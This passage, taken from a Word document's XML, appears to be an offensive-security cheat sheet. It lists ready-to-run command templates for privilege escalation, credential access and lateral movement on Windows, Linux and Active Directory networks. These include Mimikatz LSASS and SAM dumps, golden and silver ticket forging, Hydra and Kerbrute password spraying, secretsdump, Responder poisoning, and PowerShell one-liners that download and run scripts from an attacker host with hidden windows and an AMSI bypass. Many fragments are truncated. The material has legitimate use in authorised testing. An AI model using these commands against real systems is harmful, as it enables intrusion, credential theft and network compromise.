        <w:t>Windows Privilege Escalation Awesome Script that automates the enumeration of Windows systems for misconfigurations and privilege escalation paths.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System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winpeas.exe log=$OUTPUT_FILE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Fast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winpeas.exe fast log=$OUTPUT_FILE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Quiet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winpeas.exe quiet log=$OUTPUT_FILE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Search Fast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winpeas.exe searchfast log=$OUTPUT_FILE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CMD Window Title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winpeas.exe systeminfo=$SYSTEM_INFO_FILE log=$OUTPUT_FILE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Color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winpeas.exe notcolor log=$OUTPUT_FILE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Wait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winpeas.exe wait log=$OUTPUT_FILE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Specific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winpeas.exe log=$OUTPUT_FILE | findstr /i 'vulnerable exploit path'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 AMSI Bypass Execute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-nop -c "IEX(New-Object Net.WebClient).DownloadString('http://$LHOST:$LPORT/winPEAS.ps1'); Invoke-WinPEAS"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Obfuscated Run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-window hidden -c "IEX(New-Object Net.WebClient).DownloadString('http://$LHOST:$LPORT/winPEAS.ps1'); Invoke-WinPEAS -Log $OUTPUT_FILE"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pspy</w:t>
      </w:r>
      <w:bookmarkStart w:name="_Toc005_03" w:id="49"/>
      <w:bookmarkEnd w:id="49"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="4a4a4a"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Lightweight process monitoring tool that watches for running processes without root permissions, ideal for catching cron jobs and scheduled tasks.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Monitor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./pspy64 -pf -i 1000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Interval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./pspy64 -i $INTERVAL_MS -p -f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Filter Procs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./pspy64 -pf | grep -E '$FILTER_STRING'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32-bit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./pspy32 -pf -i 1000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Color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./pspy64 -pf --color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Directory Watch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./pspy64 -r $WATCH_DIR -pf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Baseline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./pspy64 -pf -i 500 -c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Specific User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./pspy64 -pf | grep -E 'UID=$UID|USER=$USERNAME'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Timestamp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./pspy64 -pf --timestamp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Limited Scope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./pspy64 -p -f -i 2000 | grep -v 'kworker' &gt;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unix-privesc-check</w:t>
      </w:r>
      <w:bookmarkStart w:name="_Toc005_04" w:id="50"/>
      <w:bookmarkEnd w:id="50"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="4a4a4a"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Unix privilege escalation checker that runs through a comprehensive list of checks to identify misconfigurations that could allow privilege escalation.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Standard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./unix-privesc-check standard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Detailed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./unix-privesc-check detailed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Writable Files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./unix-privesc-check --include-priv-files --type w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SUID Files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find / -perm -4000 -type f 2&gt;/dev/null | xargs ls -la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World Writable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find / -perm -2 ! -type l -ls 2&gt;/dev/null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Root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./unix-privesc-check --not-root standard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Module Specific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./unix-privesc-check --type=$CHECK_TYPE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Exclude Path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./unix-privesc-check --exclude-path $EXCLUDE_DIR standard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Cron Analysis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/etc/crontab; ls -la /etc/cron.*/*; find /var/spool/cron -type f 2&gt;/dev/null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Service Inspection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find /etc/init.d /lib/systemd -type f 2&gt;/dev/null | xargs grep -l 'su -' 2&gt;/dev/null &gt;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Linux Exploit Suggester</w:t>
      </w:r>
      <w:bookmarkStart w:name="_Toc005_05" w:id="51"/>
      <w:bookmarkEnd w:id="51"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="4a4a4a"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Tool that analyzes the Linux kernel version and suggests relevant local privilege escalation exploits from known vulnerability databases.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Kernel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./linux-exploit-suggester.sh -k $KERNEL_VERSION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System Auto-Detect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uname -r | xargs -I {} ./linux-exploit-suggester.sh -k {}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Check All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./linux-exploit-suggester.sh --checksec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Fetch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./linux-exploit-suggester.sh -k $KERNEL_VERSION --fetch-urls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Ubuntu Specific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./linux-exploit-suggester.sh -d $UBUNTU_VERSION -k $KERNEL_VERSION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Distribution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/etc/*release | grep 'PRETTY' | cut -d'=' -f2 | xargs ./linux-exploit-suggester.sh -d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CVE Focus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./linux-exploit-suggester.sh -k $KERNEL_VERSION | grep 'CVE'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Short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./linux-exploit-suggester.sh -k $KERNEL_VERSION --short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Verify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./linux-exploit-suggester.sh -k $KERNEL_VERSION --verify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Output URLs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./linux-exploit-suggester.sh -k $KERNEL_VERSION | grep -oP 'http[s]?://[^\s]+' &gt;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PrivescCheck (Windows)</w:t>
      </w:r>
      <w:bookmarkStart w:name="_Toc005_06" w:id="52"/>
      <w:bookmarkEnd w:id="52"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="4a4a4a"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>PowerShell script that automates the enumeration of Windows systems for privilege escalation paths including service misconfigurations and weak permissions.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Extended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Net.WebClient).DownloadString('http://$LHOST:$LPORT/PrivescCheck.ps1'); Invoke-PrivescCheck -Extended"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Audit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-Audit"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Report CSV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-Report "$OUTPUT_CSV" -Format CSV"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Report HTML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-Report "$OUTPUT_HTML" -Format HTML"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Specific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-Check $CHECK_NAME"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Exclude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-Exclude $EXCLUDE_CHECK"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Force Run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-Force"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Quiet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-Quiet"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Scope User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-Scope User"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Scope Machine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"Invoke-PrivescCheck -Scope Machine"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SUID3NUM</w:t>
      </w:r>
      <w:bookmarkStart w:name="_Toc005_07" w:id="53"/>
      <w:bookmarkEnd w:id="53"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="4a4a4a"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Python script that identifies SUID binaries with known exploitation paths and auto-exploitation capabilities for Linux privilege escalation.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--export=$EXPORT_DIR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--no-exploit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--list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Auto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--auto-exploit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Check Specific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--check $BINARY_PATH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Import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--import $SUID_LIST_FILE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Wordlist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--wordlist $WORDLIST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Color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--no-color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Verbose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-v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Help Functions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suid3num.py --show GTFOBins &gt;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Traitor</w:t>
      </w:r>
      <w:bookmarkStart w:name="_Toc005_08" w:id="54"/>
      <w:bookmarkEnd w:id="54"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="4a4a4a"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Linux privilege escalation exploit that leverages misconfigured sudo permissions, polkit, and container escapes to gain root access.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Auto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-e $EXPLOIT_NAME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--full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Docker Escape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-e docker:privileged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Sudo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-e sudo:$BINARY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Polkit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-e polkit:$POLKIT_VERSION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Kernel Exploit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-e kernel:$CVE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Writable Path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--writable-path $PATH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Capabilities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-e capabilities:$CAPABILITY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Containerd Escape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-e containerd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LXD Escape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./traitor -v -e lxd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JAWS</w:t>
      </w:r>
      <w:bookmarkStart w:name="_Toc005_09" w:id="55"/>
      <w:bookmarkEnd w:id="55"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="4a4a4a"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Just Another Windows Enum Script that provides comprehensive Windows enumeration output specifically tuned for privilege escalation opportunities.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Net.WebClient).DownloadString('http://$LHOST:$LPORT/jaws-enum.ps1'); JAWS-ENUM"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Output to File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| Out-File $OUTPUT_FILE"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Basic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-Basic"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Extended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-Extended"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Service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-Services"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Scheduled Tasks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-Scheduled"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Installed Software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-Installed"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User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-Users"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Registry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-Registry"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Network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"JAWS-ENUM -Network"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PEASS-ng</w:t>
      </w:r>
      <w:bookmarkStart w:name="_Toc005_10" w:id="56"/>
      <w:bookmarkEnd w:id="56"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="4a4a4a"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Next-generation privilege escalation awesome scripts suite covering Linux, Windows, and container environments with comprehensive enumeration checks.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All-In-One Linux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curl -sL http://$LHOST:$LPORT/linpeas.sh | sh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All-In-One Windows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Net.WebClient).DownloadString('http://$LHOST:$LPORT/winPEAS.ps1'); Invoke-WinPEAS"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Container Escape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-c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Cloud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-C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MacOS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-M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Network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-N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Password Search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-P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Interesting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-I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Stealth Fast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-s &gt; $OUTPUT_FILE 2&gt;&amp;1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Exclusions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./linpeas.sh -e /proc,/sys,/dev &gt; $OUTPUT_FILE 2&gt;&amp;1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6: Credential Access</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="ff6b35"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>  [★★★★★]</w:t>
      </w:r>
      <w:bookmarkStart w:name="_Toc006" w:id="57"/>
      <w:bookmarkEnd w:id="57"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:t>Techniques for obtaining account credentials, password hashes, access tokens, and authentication materials through extraction, dumping, and cracking methods.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Mimikatz</w:t>
      </w:r>
      <w:bookmarkStart w:name="_Toc006_01" w:id="58"/>
      <w:bookmarkEnd w:id="58"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="4a4a4a"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Powerful post-exploitation tool for extracting plaintext passwords, hashes, PIN codes, and Kerberos tickets from Windows memory.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Dump LSASS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'sekurlsa::logonpasswords' 'exit'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Dump SAM Database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'token::elevate' 'lsadump::sam' 'exit'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Dump LSADUMP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'token::elevate' 'lsadump::secrets' 'exit'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Kerberos Ticket Export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'sekurlsa::tickets /export'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Pass-the-Hash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'sekurlsa::pth /user:$USER /domain:$DOMAIN /ntlm:$NTLM_HASH /run:cmd.exe'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Golden Ticket Forge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'kerberos::golden /user:$USER /domain:$DOMAIN /sid:$SID /krbtgt:$KRBTGT_HASH /ticket:$OUTPUT_FILE'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Silver Ticket Forge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'kerberos::silver /user:$USER /domain:$DOMAIN /sid:$SID /target:$TARGET_HOST /service:$SERVICE /rc4:$HASH /ticket:$OUTPUT_FILE'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DPAPI Master Key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'dpapi::masterkey /in:$MASTER_KEY /sid:$SID /password:$PASSWORD'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Vault Credential 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'token::elevate' 'vault::cred /patch' 'exit'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Inject Process Token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'token::elevate' 'process::run /run:cmd.exe' 'exit'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Hashcat</w:t>
      </w:r>
      <w:bookmarkStart w:name="_Toc006_02" w:id="59"/>
      <w:bookmarkEnd w:id="59"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="4a4a4a"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>World's fastest password recovery utility supporting over 300 hash types with GPU acceleration, rule-based attacks, and mask-based cracking.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Dictionary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-a 0 $HASH_FILE $WORDLIST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Rule-Based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-a 0 $HASH_FILE $WORDLIST -r $RULE_FILE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Brute Force Mask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-a 3 $HASH_FILE '?a?a?a?a?a?a?a?a'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Combination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-a 1 $HASH_FILE $WORDLIST1 $WORDLIST2 -o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Hybrid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-a 6 $HASH_FILE $WORDLIST '?d?d?d?d'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Benchmark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-b -m $HASH_TYPE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Restore Session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-a 0 $HASH_FILE $WORDLIST --restore-file=$RESTORE_FILE --session=$SESSION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Show Cracked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$HASH_FILE --show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Output Format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-a 0 $HASH_FILE $WORDLIST --outfile-format=2 -o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Workload Tuning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hashcat -m $HASH_TYPE -a 3 $HASH_FILE '?1?1?1?1?1?1?1' -1 ?l?d?u -w 4 -O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John the Ripper</w:t>
      </w:r>
      <w:bookmarkStart w:name="_Toc006_03" w:id="60"/>
      <w:bookmarkEnd w:id="60"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="4a4a4a"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Open-source password security auditing and password recovery tool supporting hundreds of hash and cipher types with multiple attack modes.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Single Crack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--single --format=$FORMAT $HASH_FILE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Wordlist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--wordlist=$WORDLIST --format=$FORMAT $HASH_FILE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Incremental Brute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--incremental=$MODE --format=$FORMAT $HASH_FILE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Show Cracked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--show --format=$FORMAT $HASH_FILE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Rules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--wordlist=$WORDLIST --rules:$RULE_SET --format=$FORMAT $HASH_FILE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Mask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--mask='?1?1?1?1?1?1?1' -1='?l?d' --format=$FORMAT $HASH_FILE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Loopback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--wordlist=$WORDLIST --loopback --format=$FORMAT $HASH_FILE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External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--external=$MODE --format=$FORMAT $HASH_FILE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Make Charset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--make-charset=$CHARSET_FILE $HASH_FILE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Session Restore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john --restore=$SESSION_NAME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Hydra</w:t>
      </w:r>
      <w:bookmarkStart w:name="_Toc006_04" w:id="61"/>
      <w:bookmarkEnd w:id="61"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="4a4a4a"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Fast and flexible network logon cracker supporting over 50 protocols with parallel connection testing and customizable attack parameters.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SSH Brute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 -P $WORDLIST ssh://$TARGET -t 6 -o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FTP Credential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$USERLIST -P $WORDLIST ftp://$TARGET -t 16 -o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 Form Post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 -P $WORDLIST $TARGET http-post-form '/login:username=^USER^&amp;password=^PASS^:F=invalid' -t 16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SMB Brute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$USERLIST -P $WORDLIST smb://$TARGET -t 8 -o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RDP Brute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$USERLIST -P $WORDLIST rdp://$TARGET -t 4 -o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MySQL Credential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 -P $WORDLIST mysql://$TARGET -t 8 -o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VNC Brute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-P $WORDLIST vnc://$TARGET -t 4 -o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 Basic Auth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 -P $WORDLIST $TARGET http-get -t 16 -o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Telnet Brute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$USERLIST -P $WORDLIST telnet://$TARGET -t 8 -o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Service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hydra -l $USER -P $WORDLIST $TARGET $SERVICE -m $MODULE -t 8 -o $OUTPUT_FILE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CrackMapExec</w:t>
      </w:r>
      <w:bookmarkStart w:name="_Toc006_05" w:id="62"/>
      <w:bookmarkEnd w:id="62"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="4a4a4a"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Swiss Army knife for pentesting Windows and Active Directory environments with credential testing, enumeration, and lateral movement capabilities.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SMB Credential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 -u $USER -p $PASSWORD -d $DOMAIN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Password Spray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$TARGET_CIDR -u $USERLIST -p '$PASSWORD' --continue-on-success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NTLM Hash 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 -u $USER -H $NTLM_HASH --local-auth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Dump SAM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 -u $USER -p $PASSWORD --sam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LSASS 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 -u $USER -p $PASSWORD -M lsassy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Shares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$TARGET_CIDR -u $USER -p $PASSWORD --shares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Logged On Users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 -u $USER -p $PASSWORD --loggedon-users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Spider Plus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 -u $USER -p $PASSWORD -M spider_plus -o READ_ONLY=false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WMI Module Exec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smb $TARGET -u $USER -p $PASSWORD -x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LDAP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crackmapexec ldap $TARGET -u $USER -p $PASSWORD --users --groups --computers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LaZagne</w:t>
      </w:r>
      <w:bookmarkStart w:name="_Toc006_06" w:id="63"/>
      <w:bookmarkEnd w:id="63"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="4a4a4a"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Open-source application that retrieves passwords stored on a local computer from browsers, databases, email clients, and various software.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All Passwords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all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Browser Passwords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browsers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Database Passwords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databases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Git Credentials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git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Maven Credentials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maven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Memory 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memory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Wifi Passwords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wifi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Quiet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all -quiet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Verbose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all -vv -oN -output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Specific Application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laZagne.py $CATEGORY -oN -output $OUTPUT_DIR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SharpHound</w:t>
      </w:r>
      <w:bookmarkStart w:name="_Toc006_07" w:id="64"/>
      <w:bookmarkEnd w:id="64"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="4a4a4a"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>C# ingestor for BloodHound that collects Active Directory security information including ACLs, group memberships, and session data.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Default Collection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Default --OutputDirectory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All Collection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All --OutputDirectory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Session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Session --OutputDirectory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ACL Collection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ACL --OutputDirectory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Local Admin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LocalAdmin --OutputDirectory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RDP Session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RDP --OutputDirectory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PS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PSRemote --OutputDirectory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LoggedOn Users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LoggedOn --OutputDirectory $OUTPUT_DIR --Loop --LoopDuration 01:00:00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Exclude Domain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Default --ExcludeDomain $EXCLUDE_DOMAIN --OutputDirectory $OUTPUT_DIR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Stealth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SharpHound.exe --CollectionMethods Session,LoggedOn --Stealth --OutputDirectory $OUTPUT_DIR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 secretsdump.py</w:t>
      </w:r>
      <w:bookmarkStart w:name="_Toc006_08" w:id="65"/>
      <w:bookmarkEnd w:id="65"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="4a4a4a"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Impacket tool that extracts NTDS.dit, SAM, and LSA secrets from remote Windows systems via DRSUAPI or VSS methods.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Remote SAM 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$DOMAIN/$USER:$PASSWORD@$TARGET -sam $SAM_FILE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NTDS.dit Extract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$DOMAIN/$USER:$PASSWORD@$TARGET -use-vss -system $SYSTEM_HIVE -ntds $NTDS_FILE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Local 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-system $SYSTEM_HIVE -security $SECURITY_HIVE -sam $SAM_HIVE LOCAL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DRSUAPI Method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$DOMAIN/$USER:$PASSWORD@$DC_IP -just-dc-ntlm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All Hashes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$DOMAIN/$USER:$PASSWORD@$DC_IP -just-dc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Kerberos Keys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$DOMAIN/$USER:$PASSWORD@$DC_IP -just-dc-user $KRBTGT_USER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History Hashes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$DOMAIN/$USER:$PASSWORD@$DC_IP -history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PWD Last Set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$DOMAIN/$USER:$PASSWORD@$DC_IP -pwd-last-set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Member of AD Group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$DOMAIN/$USER:$PASSWORD@$DC_IP -just-dc-group '$GROUP_NAME'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Pass-the-Hash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secretsdump.py -hashes $LMHASH:$NTHASH $DOMAIN/$USER@$TARGET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Responder</w:t>
      </w:r>
      <w:bookmarkStart w:name="_Toc006_09" w:id="66"/>
      <w:bookmarkEnd w:id="66"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="4a4a4a"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>LLMNR, NBT-NS, and MDNS poisoner with built-in HTTP, SMB, MSSQL, FTP, and LDAP rogue authentication servers for credential harvesting.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Poisoner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-wrfv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Analyze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-A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WPAD Rogue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-wF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Basic Auth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-bF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Finger Print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-f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 Server Off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-wrfv --http Off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SMB Challenge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-v --lm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Challenge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-e $CHALLENGE_HASH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DHCP Auth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-d -D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Show Database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Responder.py -I $INTERFACE --ssl &amp;&amp; sqlite3 Responder.db 'SELECT * FROM responder'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Kerbrute</w:t>
      </w:r>
      <w:bookmarkStart w:name="_Toc006_10" w:id="67"/>
      <w:bookmarkEnd w:id="67"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="4a4a4a"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Fast Kerberos brute-forcing and user enumeration tool written in Go that validates domain usernames and performs password spraying.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User Enumeration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userenum -d $DOMAIN --dc $DC_IP $USERLIST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Password Spray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passwordspray -d $DOMAIN --dc $DC_IP $USERLIST '$PASSWORD'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Brute Force User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bruteuser -d $DOMAIN --dc $DC_IP $WORDLIST $USERNAME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Brute Force All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bruteuser -d $DOMAIN --dc $DC_IP $WORDLIST $USERLIST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Safe Mode Spray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passwordspray -d $DOMAIN --dc $DC_IP $USERLIST '$PASSWORD' --safe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Delay Spray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passwordspray -d $DOMAIN --dc $DC_IP $USERLIST '$PASSWORD' -t 5 -o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JSON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userenum -d $DOMAIN --dc $DC_IP $USERLIST -oJ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Hashcat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userenum -d $DOMAIN --dc $DC_IP $USERLIST --hashcat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JTR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userenum -d $DOMAIN --dc $DC_IP $USERLIST --john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Kerberos Pre-auth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kerbrute userenum -d $DOMAIN --dc $DC_IP $USERLIST --downgrade -o $OUTPUT_FILE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7: Lateral Movement</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="ff6b35"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>  [★★★★★]</w:t>
      </w:r>
      <w:bookmarkStart w:name="_Toc007" w:id="68"/>
      <w:bookmarkEnd w:id="68"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:t>Techniques for moving through a compromised network using valid credentials, remote services, and built-in administrative tools to reach target systems.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Impacket Suite</w:t>
      </w:r>
      <w:bookmarkStart w:name="_Toc007_01" w:id="69"/>
      <w:bookmarkEnd w:id="69"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="4a4a4a"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Collection of Python classes for working with network protocols that enables credential-based lateral movement across Windows environments.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PSExec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psexec.py $DOMAIN/$USER:$PASSWORD@$TARGET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WMIExec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wmiexec.py $DOMAIN/$USER:$PASSWORD@$TARGET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SMBExec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smbexec.py $DOMAIN/$USER:$PASSWORD@$TARGET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AtExec Scheduled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atexec.py $DOMAIN/$USER:$PASSWORD@$TARGET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DCOM Exec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dcomexec.py $DOMAIN/$USER:$PASSWORD@$TARGET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Pass-the-Hash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psexec.py -hashes $LMHASH:$NTHASH $DOMAIN/$USER@$TARGET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SMBClient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smbclient.py $DOMAIN/$USER:$PASSWORD@$TARGET -dc-ip $DC_IP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Lookupsid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lookupsid.py $DOMAIN/$USER:$PASSWORD@$TARGET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Samrdump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samrdump.py $DOMAIN/$USER:$PASSWORD@$TARGET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 View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netview.py $DOMAIN/$USER:$PASSWORD $TARGET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Evil-WinRM</w:t>
      </w:r>
      <w:bookmarkStart w:name="_Toc007_02" w:id="70"/>
      <w:bookmarkEnd w:id="70"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="4a4a4a"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Ultimate WinRM shell for pentesting that provides a fully functional shell with upload, download, and command execution via Windows Remote Management.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Basic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-p $PASSWORD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Pass-the-Hash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-H $NTLM_HASH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SSL Connection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-p $PASSWORD -S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-p $PASSWORD -P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Public Key Auth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-k $PRIVATE_KEY -S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Script Execution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-p $PASSWORD -s $SCRIPT_PATH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Executable Execution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-p $PASSWORD -e $EXEC_PATH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Menu Disable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-p $PASSWORD -N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Proxy Aware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-p $PASSWORD --proxy http://$PROXY:8080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Debug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evil-winrm -i $TARGET -u $USER -p $PASSWORD -l $LOG_FILE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PowerShell Empire</w:t>
      </w:r>
      <w:bookmarkStart w:name="_Toc007_03" w:id="71"/>
      <w:bookmarkEnd w:id="71"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="4a4a4a"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Post-exploitation framework with pure PowerShell agents for lateral movement through WMI, WinRM, scheduled tasks, and DCOM execution.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WMI Lateral Move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lateral_movement/invoke_wmi; set ComputerName $TARGET; set Listener $LISTENER; set UserName $DOMAIN/$USER; set Password $PASSWORD;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PSRemoting Move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lateral_movement/invoke_psremoting; set ComputerName $TARGET; set Listener $LISTENER;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SMB Exec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lateral_movement/invoke_smbexec; set ComputerName $TARGET; set Listener $LISTENER; set UserName $USER;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DCOM Move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lateral_movement/invoke_dcom; set ComputerName $TARGET; set Listener $LISTENER;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Mimikatz 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lateral_movement/invoke_pth; set CredentialID $CRED_ID; set ComputerName $TARGET;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Schedule Task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lateral_movement/new_gpo_immediate_task; set Listener $LISTENER; set ComputerName $TARGET;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Token Impersonation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credentials/tokens; set ImpersonateUser $USER;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Port Scanner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situational_awareness/network/portscan; set Hosts $TARGET_RANGE; set TopPorts 50;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ARP Scanner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situational_awareness/network/arpscan; set Range $CIDR; execute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Local Admin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usemodule situational_awareness/network/powerview/find_localadmin_access; execute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BloodHound</w:t>
      </w:r>
      <w:bookmarkStart w:name="_Toc007_04" w:id="72"/>
      <w:bookmarkEnd w:id="72"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="4a4a4a"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Active Directory attack path analysis tool that visualizes privilege escalation and lateral movement paths through graph database relationships.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Ingest Data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bloodhound-python -d $DOMAIN -u $USER -p $PASSWORD -c All -ns $DC_IP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Collect Sessions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bloodhound-python -d $DOMAIN -u $USER -p $PASSWORD -c Session -ns $DC_IP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Collect ACL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bloodhound-python -d $DOMAIN -u $USER -p $PASSWORD -c ACL -ns $DC_IP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Pass-the-Hash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bloodhound-python -d $DOMAIN -u $USER --hashes $HASH -c All -ns $DC_IP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SharpHound Ingest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 --db bolt://localhost:7687 -c "MATCH (n) RETURN n LIMIT 25"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Query Shortest Path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 --db bolt://localhost:7687 -c "MATCH p=shortestPath((a:User {name:'$USER@$DOMAIN'})-[*1..]-&gt;(b:Computer {name:'$TARGET.$DOMAIN'})) RETURN p"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Owned Objects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 --db bolt://localhost:7687 -c "MATCH (n:User {owned:true})-[r]-&gt;(m) RETURN n,r,m"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High Value Targets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 --db bolt://localhost:7687 -c "MATCH (n:Group {highvalue:true}) RETURN n.name"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Kerberoastable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 --db bolt://localhost:7687 -c "MATCH (n:User {hasspn:true}) RETURN n.name, n.serviceprincipalnames"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AS-REP Roastable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bloodhound --db bolt://localhost:7687 -c "MATCH (n:User {dontreqpreauth: true}) RETURN n.name"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PsExec (Sysinternals)</w:t>
      </w:r>
      <w:bookmarkStart w:name="_Toc007_05" w:id="73"/>
      <w:bookmarkEnd w:id="73"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="4a4a4a"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Lightweight Telnet-replacement that lets you execute processes on remote Windows systems using SMB with full interactive console support.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Remote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cmd.exe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Execute Command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-s cmd.exe /c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System Context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-s -i cmd.exe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Copy &amp; Execute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-c $LOCAL_FILE -f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Accept EULA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-accepteula cmd.exe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Background Run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-d cmd.exe /c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Limited Timeout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-n 10 cmd.exe /c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Run As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-h cmd.exe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Profile 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\\$TARGET -u $DOMAIN\$USER -p $PASSWORD -e cmd.exe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Multiple Targets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psexec.exe @$TARGETS_FILE -u $DOMAIN\$USER -p $PASSWORD cmd.exe /c '$COMMAND'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SSHuttle</w:t>
      </w:r>
      <w:bookmarkStart w:name="_Toc007_06" w:id="74"/>
      <w:bookmarkEnd w:id="74"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="4a4a4a"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Transparent proxy server that tunnels TCP traffic over SSH without requiring root access on the remote side, ideal for pivoting through Linux hosts.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Subnet Tunnel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-r $USER@$PIVOT_HOST $TARGET_SUBNET/$MASK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Forward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-r $USER@$PIVOT_HOST $TARGET_SUBNET --dns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Exclude Hosts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-r $USER@$PIVOT_HOST $TARGET_SUBNET --exclude $EXCLUDE_IP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Listen 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-r $USER@$PIVOT_HOST $TARGET_SUBNET -l 0.0.0.0:$LOCAL_PORT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Latency Control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-r $USER@$PIVOT_HOST $TARGET_SUBNET --no-latency-control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Auto Hosts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-r $USER@$PIVOT_HOST $TARGET_SUBNET --auto-hosts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Seed Hosts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-r $USER@$PIVOT_HOST $TARGET_SUBNET --seed-hosts $SEED_HOSTS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Tproxy Method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--method tproxy -r $USER@$PIVOT_HOST $TARGET_SUBNET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Multiple Networks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-r $USER@$PIVOT_HOST $SUBNET1 $SUBNET2 $SUBNET3 --ssh-cmd 'ssh -i $KEY_FILE'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Daemon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sshuttle -D -r $USER@$PIVOT_HOST $TARGET_SUBNET --pidfile $PID_FILE --ssh-cmd 'ssh -i 